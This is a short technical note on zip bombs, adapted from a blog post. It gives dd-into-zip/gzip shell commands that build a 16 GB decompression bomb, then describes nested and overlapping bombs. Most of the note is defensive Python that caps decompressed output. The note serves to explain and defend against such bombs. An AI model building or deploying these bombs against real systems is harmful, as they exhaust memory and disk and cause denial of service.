Note
Adapted from "I use Zip Bombs to Protect my Server".
The simplest zip bomb is probably something like the following, which should create a relatively small file that decompresses to 16 GB:
```bash
# Using zip
dd if=/dev/zero bs=1G count=16 | zip zipbomb.zip -

# Using gzip
dd if=/dev/zero bs=1G count=16 | gzip -c > gzipbomb.gz
```
More sophisticated zip bombs, such as the famous 42.zip, can use nesting to achieve much more significant results (42.zip is ~42 KB in size, but will decompress to multiple files totalling ~4.5 PB). Custom code can achieve even greater decompression ratios without nesting by overlapping files within the compressed archive.
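On the receiving side, the defence against all of these is to cap decompressed output rather than trust the compressed size. The following is an added example, not code from the original post; the function names, the caps and the constructed 8 MiB sample are assumptions chosen for illustration.

```python
import gzip
import io
import zipfile
import zlib

class DecompressionLimitExceeded(Exception):
    """Decompressed output grew past the caller's cap."""

def bounded_gunzip(data: bytes, max_out: int, chunk: int = 64 * 1024) -> bytes:
    """Inflate one gzip member, refusing to produce more than max_out bytes."""
    d = zlib.decompressobj(wbits=31)  # 31 selects the gzip container
    out, buf = bytearray(), data
    while not d.eof:
        # max_length caps what a single call may emit, so memory stays bounded.
        piece = d.decompress(buf, min(chunk, max_out - len(out) + 1))
        out += piece
        if len(out) > max_out:
            raise DecompressionLimitExceeded(f"gzip output exceeds {max_out} bytes")
        buf = d.unconsumed_tail
        if not piece and not buf and not d.eof:
            raise ValueError("truncated gzip stream")
    return bytes(out)

def bounded_unzip(data: bytes, max_total: int, chunk: int = 64 * 1024) -> dict:
    """Read every member of a zip, capping the total decompressed size."""
    files, total = {}, 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        # Cheap pre-check on declared sizes; overlapping members still add up here.
        if sum(i.file_size for i in zf.infolist()) > max_total:
            raise DecompressionLimitExceeded("declared sizes exceed cap")
        for info in zf.infolist():
            body = bytearray()
            with zf.open(info) as member:
                # Stream and count real output instead of trusting the header.
                while block := member.read(chunk):
                    total += len(block)
                    if total > max_total:
                        raise DecompressionLimitExceeded("zip output exceeds cap")
                    body += block
            files[info.filename] = bytes(body)  # nested archives stay as bytes
    return files

def constructed_samples(size: int = 8 * 1024 * 1024):
    """Constructed test input: `size` zero bytes as gzip and as zip (a few KB each)."""
    zeros = bytes(size)
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("zeros.bin", zeros)
    return gzip.compress(zeros), zbuf.getvalue()
```

Because `bounded_unzip` never recurses into members, a nested archive is returned as opaque bytes, and any further unpacking has to go through the same cap.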